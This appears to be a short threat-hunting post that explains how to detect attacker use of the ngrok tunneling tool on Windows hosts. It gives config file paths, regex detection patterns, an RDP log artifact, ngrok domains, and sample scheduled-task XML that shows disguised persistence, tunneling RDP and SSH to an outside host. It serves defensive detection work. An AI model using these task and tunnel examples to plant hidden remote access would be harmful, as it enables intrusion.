[ << ALL_FEED ]

Ngrok. Finding and figuring it out

More in General

Ngrok. Finding and understanding it 🔍

In the process of investigating numerous incidents, we repeatedly encounter a tool such as ngrok. It is a convenient legitimate tool for tunneling network connections, intended for administrators.

It has become very popular among attackers, who, as a rule, establish RDP connections, and we strongly recommend searching for ngrok in your infrastructure.

Several recommendations for searching for signs of ngrok usage on hosts:

1️⃣ The presence of a file named ngrok.yml or directories ngrok, .ngrok2, which, as a rule, have the following file paths:


C:\Users\<username>\.ngrok2\ngrok.yml
C:\Windows\ServiceProfiles\NetworkService\AppData\Local\ngrok\ngrok.yml
C:\Windows\SysWOW64\config\systemprofile\.ngrok2\ngrok.yml
Code language: YAML (yaml)


2️⃣ The presence of a *.yml, file containing strings matching the following patterns:


'version\: \"[0-9]+\"'
'authtoken\: [a-z0-9_]{49}'
Code language: plaintext (plaintext)


Example (ngrok.yml):

version: "2"
authtoken: 5U87lkcqEFeZ0sJ7Hg66aXkkrO4_K9EpjQHkJMkTg0R96pu64
Code language: YAML (yaml)


3️⃣ The presence of the string ::%16777216 as the source network address in network connection logs:


C:\Windows\System32\winevt\logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx
C:\Windows\System32\winevt\logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx
Code language: YAML (yaml)


4️⃣ The presence of a Windows Task Scheduler file used to establish persistence on the host and which may contain strings matching the following patterns:

'<Arguments>tcp [0-9]+</Arguments>'
'<Arguments>tcp [^ ]+\:[0-9]+ \-\-authtoken [a-z0-9_]{49}</Arguments>'
Code language: plaintext (plaintext)


Example 1 (C:\Windows\System32\Tasks\Microsoft\Windows\Microsoft\Monitor):

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  ...
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\Microsoft\1.exe</Command>
      <Arguments>tcp 3389</Arguments>
    </Exec>
  </Actions>
</Task>
Code language: plaintext (plaintext)


Example 2 (C:\Windows\System32\Tasks\updater):

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  ...
  <Actions Context="Author">
    <Exec>
      <Command>C:\ProgramData\1.exe</Command>
      <Arguments>tcp poc.opi.rtyo.ru:22 --authtoken qr7pKMAgTp5nfT0HTwh21sb9VsF_FwX3xkNuQqJE7MBh0gUj8</Arguments>
      <WorkingDirectory>C:\ProgramData</WorkingDirectory>
    </Exec>
  </Actions>
</Task>
Code language: plaintext (plaintext)


📌 To detect signs of the tool’s presence on the perimeter, you can search for hosts communicating with the following servers:


ngrok.com
ngrok-agent.com
ngrok.io
*.equinox.io
Code language: plaintext (plaintext)


#tip #detect #hacktool #dfir
@ptescalator

More from oUth0R

More from oUth0R

More in General